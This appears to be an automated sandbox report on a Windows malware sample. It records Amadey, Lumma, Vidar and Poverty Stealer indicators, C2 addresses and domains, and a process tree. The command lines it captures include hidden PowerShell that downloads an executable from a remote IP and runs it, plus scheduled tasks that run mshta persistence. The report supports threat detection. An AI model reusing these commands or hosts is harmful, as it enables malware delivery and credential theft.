Analysis
-
max time kernel
30s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 17:52
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240729-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
34a1010b4f6cf9c985d71453702602d7
-
SHA1
266541f9f120e4d4b79ebb5687bbe8a045281b6b
-
SHA256
ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09
-
SHA512
fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d
-
SSDEEP
49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://garisechairedd.shop/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://0modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 7 IoCs
resource yara_rule behavioral1/memory/2216-201-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-199-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-207-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-206-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-204-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-213-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer behavioral1/memory/2216-228-0x0000000000400000-0x000000000040A000-memory.dmp family_povertystealer -
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x000600000001a41d-260.dat family_vidar_v7 -
Lumma family
-
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 10 2560 powershell.exe 11 2996 powershell.exe -
pid Process 2952 powershell.exe 2968 powershell.exe 3004 powershell.exe 2172 powershell.exe 2560 powershell.exe 2996 powershell.exe -
Downloads MZ/PE file 6 IoCs
flow pid Process 5 1960 rapes.exe 5 1960 rapes.exe 5 1960 rapes.exe 5 1960 rapes.exe 10 2560 powershell.exe 11 2996 powershell.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Executes dropped EXE 10 IoCs
pid Process 1960 rapes.exe 2092 V0Bt74c.exe 3020 V0Bt74c.exe 944 37dd753784.exe 1724 TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE 676 lk7ybIi.exe 2216 lk7ybIi.exe 716 483d2fa8a0d53818306efeb32d3.exe 864 mIrI3a9.exe 1724 sqVWjvh.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE -
Loads dropped DLL 28 IoCs
pid Process 2376 random.exe 2376 random.exe 1960 rapes.exe 2092 V0Bt74c.exe 2684 WerFault.exe 2684 WerFault.exe 2684 WerFault.exe 2684 WerFault.exe 2684 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 2176 WerFault.exe 1960 rapes.exe 2560 powershell.exe 2560 powershell.exe 1960 rapes.exe 676 lk7ybIi.exe 2104 WerFault.exe 2104 WerFault.exe 2104 WerFault.exe 2104 WerFault.exe 2104 WerFault.exe 2996 powershell.exe 2996 powershell.exe 1960 rapes.exe 1960 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\37dd753784.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126980101\\37dd753784.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126990121\\am_no.cmd" rapes.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000900000001961c-111.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2376 random.exe 1960 rapes.exe 1724 TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE 716 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2092 set thread context of 3020 2092 V0Bt74c.exe 33 PID 676 set thread context of 2216 676 lk7ybIi.exe 59 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job random.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2684 2092 WerFault.exe 32 2176 3020 WerFault.exe 33 2104 676 WerFault.exe 58 -
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language V0Bt74c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lk7ybIi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mIrI3a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqVWjvh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language V0Bt74c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37dd753784.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2844 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sqVWjvh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sqVWjvh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sqVWjvh.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1864 schtasks.exe 1948 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2376 random.exe 1960 rapes.exe 2560 powershell.exe 2560 powershell.exe 2560 powershell.exe 1724 TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE 2952 powershell.exe 2968 powershell.exe 3004 powershell.exe 2996 powershell.exe 2996 powershell.exe 2996 powershell.exe 716 483d2fa8a0d53818306efeb32d3.exe 2172 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2376 random.exe 944 37dd753784.exe 944 37dd753784.exe 944 37dd753784.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 944 37dd753784.exe 944 37dd753784.exe 944 37dd753784.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2376 wrote to memory of 1960 2376 random.exe 30 PID 2376 wrote to memory of 1960 2376 random.exe 30 PID 2376 wrote to memory of 1960 2376 random.exe 30 PID 2376 wrote to memory of 1960 2376 random.exe 30 PID 1960 wrote to memory of 2092 1960 rapes.exe 32 PID 1960 wrote to memory of 2092 1960 rapes.exe 32 PID 1960 wrote to memory of 2092 1960 rapes.exe 32 PID 1960 wrote to memory of 2092 1960 rapes.exe 32 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 3020 2092 V0Bt74c.exe 33 PID 2092 wrote to memory of 2684 2092 V0Bt74c.exe 34 PID 2092 wrote to memory of 2684 2092 V0Bt74c.exe 34 PID 2092 wrote to memory of 2684 2092 V0Bt74c.exe 34 PID 2092 wrote to memory of 2684 2092 V0Bt74c.exe 34 PID 3020 wrote to memory of 2176 3020 V0Bt74c.exe 36 PID 3020 wrote to memory of 2176 3020 V0Bt74c.exe 36 PID 3020 wrote to memory of 2176 3020 V0Bt74c.exe 36 PID 3020 wrote to memory of 2176 3020 V0Bt74c.exe 36 PID 1960 wrote to memory of 944 1960 rapes.exe 37 PID 1960 wrote to memory of 944 1960 rapes.exe 37 PID 1960 wrote to memory of 944 1960 rapes.exe 37 PID 1960 wrote to memory of 944 1960 rapes.exe 37 PID 944 wrote to memory of 2588 944 37dd753784.exe 38 PID 944 wrote to memory of 2588 944 37dd753784.exe 38 PID 944 wrote to memory of 2588 944 37dd753784.exe 38 PID 944 wrote to memory of 2588 944 37dd753784.exe 38 PID 944 wrote to memory of 2108 944 37dd753784.exe 39 PID 944 wrote to memory of 2108 944 37dd753784.exe 39 PID 944 wrote to memory of 2108 944 37dd753784.exe 39 PID 944 wrote to memory of 2108 944 37dd753784.exe 39 PID 2588 wrote to memory of 1864 2588 cmd.exe 41 PID 2588 wrote to memory of 1864 2588 cmd.exe 41 PID 2588 wrote to memory of 1864 2588 cmd.exe 41 PID 2588 wrote to memory of 1864 2588 cmd.exe 41 PID 2108 wrote to memory of 2560 2108 mshta.exe 42 PID 2108 wrote to memory of 2560 2108 mshta.exe 42 PID 2108 wrote to memory of 2560 2108 mshta.exe 42 PID 2108 wrote to memory of 2560 2108 mshta.exe 42 PID 2560 wrote to memory of 1724 2560 powershell.exe 44 PID 2560 wrote to memory of 1724 2560 powershell.exe 44 PID 2560 wrote to memory of 1724 2560 powershell.exe 44 PID 2560 wrote to memory of 1724 2560 powershell.exe 44 PID 1960 wrote to memory of 2400 1960 rapes.exe 45 PID 1960 wrote to memory of 2400 1960 rapes.exe 45 PID 1960 wrote to memory of 2400 1960 rapes.exe 45 PID 1960 wrote to memory of 2400 1960 rapes.exe 45 PID 2400 wrote to memory of 2844 2400 cmd.exe 47 PID 2400 wrote to memory of 2844 2400 cmd.exe 47 PID 2400 wrote to memory of 2844 2400 cmd.exe 47 PID 2400 wrote to memory of 2844 2400 cmd.exe 47 PID 2400 wrote to memory of 2800 2400 cmd.exe 48 PID 2400 wrote to memory of 2800 2400 cmd.exe 48 PID 2400 wrote to memory of 2800 2400 cmd.exe 48 PID 2400 wrote to memory of 2800 2400 cmd.exe 48 PID 2800 wrote to memory of 2952 2800 cmd.exe 49 PID 2800 wrote to memory of 2952 2800 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 10685⤵
- Loads dropped DLL
- Program crash
PID:2176
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2684
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126980101\37dd753784.exe"C:\Users\Admin\AppData\Local\Temp\10126980101\37dd753784.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 8VhwTmasFjs /tr "mshta C:\Users\Admin\AppData\Local\Temp\NUCwYtdTH.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 8VhwTmasFjs /tr "mshta C:\Users\Admin\AppData\Local\Temp\NUCwYtdTH.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1864
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NUCwYtdTH.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'G1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\AppData\Local\TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE"C:\Users\Admin\AppData\Local\TempG1D3GUQXULBRN3VMHLCXYFC4XXCOVTVW.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1724
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10126990121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "a6Kmrma9SPx" /tr "mshta \"C:\Temp\EoZgUaMqN.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1948
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\EoZgUaMqN.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996 -
